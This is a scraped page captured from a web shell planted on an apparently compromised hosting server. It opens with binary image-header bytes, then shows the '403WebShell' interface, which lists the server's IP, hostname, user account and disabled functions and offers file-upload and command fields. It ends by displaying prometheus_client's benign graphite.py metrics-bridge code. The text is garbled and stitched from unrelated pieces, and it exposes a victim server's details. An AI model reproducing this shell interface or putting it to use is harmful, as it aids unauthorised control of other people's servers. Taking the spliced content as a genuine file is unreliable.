JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 185.124.137.5  /  Your IP : 216.73.216.91
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/alt/python311/lib/python3.11/site-packages/prometheus_client/bridge/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/alt/python311/lib/python3.11/site-packages/prometheus_client/bridge/graphite.py
#!/usr/bin/env python

import logging
import re
import socket
import threading
import time
from timeit import default_timer
from typing import Callable, Tuple

from ..registry import CollectorRegistry, REGISTRY

# Roughly, have to keep to what works as a file name.
# We also remove periods, so labels can be distinguished.

_INVALID_GRAPHITE_CHARS = re.compile(r"[^a-zA-Z0-9_-]")


def _sanitize(s):
    """Return ``s`` with each character outside ``[a-zA-Z0-9_-]`` replaced by ``_``.

    Periods are among the replaced characters, so a sanitized name or label
    never contains the ``.`` that separates path components.
    """
    cleaned = re.sub(_INVALID_GRAPHITE_CHARS, '_', s)
    return cleaned


class _RegularPush(threading.Thread):
    """Thread that calls ``pusher.push(prefix=...)`` on a fixed schedule.

    The first push happens as soon as the thread runs; later deadlines are
    the start time plus whole multiples of ``interval``. If a push overruns
    one or more deadlines, those deadlines are skipped rather than queued.
    """

    def __init__(self, pusher, interval, prefix):
        """Store the push target and its schedule.

        Args:
            pusher: object exposing ``push(prefix=...)``.
            interval: seconds between scheduled pushes; must be positive.
            prefix: value forwarded to ``pusher.push`` on every call.

        Raises:
            ValueError: if ``interval`` is zero, negative or NaN.
        """
        # With a zero or negative interval the catch-up loop in run() can never
        # move the deadline past "now" and would spin forever without pushing;
        # NaN cannot be scheduled either. Fail loudly at construction instead.
        if not interval > 0:
            raise ValueError(
                f"interval must be a positive number of seconds, got {interval!r}")
        super().__init__()
        self._pusher = pusher
        self._interval = interval
        self._prefix = prefix

    def run(self):
        """Push forever, logging (not propagating) ``OSError`` from a push."""
        wait_until = default_timer()
        while True:
            while True:
                now = default_timer()
                if now >= wait_until:
                    # May need to skip some pushes.
                    while wait_until < now:
                        wait_until += self._interval
                    break
                # time.sleep can return early.
                time.sleep(wait_until - now)
            try:
                self._pusher.push(prefix=self._prefix)
            except OSError:
                # Only OSError is treated as transient; any other exception
                # propagates and ends the thread.
                logging.exception("Push failed")


class GraphiteBridge:
    """Send the samples of a registry to a Graphite server over TCP.

    Every :meth:`push` opens a fresh connection to ``address``, writes one
    line per sample in the form ``<name><labels> <value> <timestamp>`` and
    closes the connection again.
    """

    def __init__(self,
                 address: Tuple[str, int],
                 registry: CollectorRegistry = REGISTRY,
                 timeout_seconds: float = 30,
                 _timer: Callable[[], float] = time.time,
                 tags: bool = False,
                 ):
        """Configure the bridge; no connection is opened here.

        Args:
            address: ``(host, port)`` passed to ``socket.create_connection``.
            registry: source of metrics; its ``collect()`` is called per push.
            timeout_seconds: timeout passed to ``socket.create_connection``.
            _timer: callable returning the current time; its result is
                truncated to an integer timestamp for every line.
            tags: when true, labels are appended as ``;key=value`` pairs;
                otherwise as ``.key.value`` path components.
        """
        self._address = address
        self._registry = registry
        self._tags = tags
        self._timeout = timeout_seconds
        self._timer = _timer

    def push(self, prefix: str = '') -> None:
        """Collect all samples and send them in a single connection.

        Args:
            prefix: when non-empty, ``prefix + '.'`` is prepended to every
                metric name. The prefix is used verbatim (it is not
                sanitized), so it must be ASCII-encodable.

        Raises:
            OSError: if connecting or sending fails.
            UnicodeEncodeError: if the payload contains non-ASCII text.
        """
        now = int(self._timer())
        prefixstr = prefix + '.' if prefix else ''

        # The label layout depends only on the bridge configuration, so it is
        # chosen once rather than per sample.
        if self._tags:
            sep, fmt = ';', '{0}={1}'
        else:
            sep, fmt = '.', '{0}.{1}'

        output = []
        for metric in self._registry.collect():
            for s in metric.samples:
                if s.labels:
                    # Sorted so the same label set always yields the same path.
                    labelstr = sep + sep.join(
                        fmt.format(_sanitize(k), _sanitize(v))
                        for k, v in sorted(s.labels.items()))
                else:
                    labelstr = ''
                output.append(f'{prefixstr}{_sanitize(s.name)}{labelstr} {float(s.value)} {now}\n')

        # Encode before connecting so an encoding failure never opens a socket.
        payload = ''.join(output).encode('ascii')

        # The context manager closes the socket even if sendall() raises.
        with socket.create_connection(self._address, self._timeout) as conn:
            conn.sendall(payload)

    def start(self, interval: float = 60.0, prefix: str = '') -> None:
        """Start a daemon thread that calls :meth:`push` every ``interval`` seconds.

        Args:
            interval: seconds between pushes.
            prefix: forwarded to every :meth:`push` call.
        """
        t = _RegularPush(self, interval, prefix)
        # Daemon thread: it must not keep the interpreter alive at shutdown.
        t.daemon = True
        t.start()

Youez - 2016 - github.com/yon3zu
LinuXploit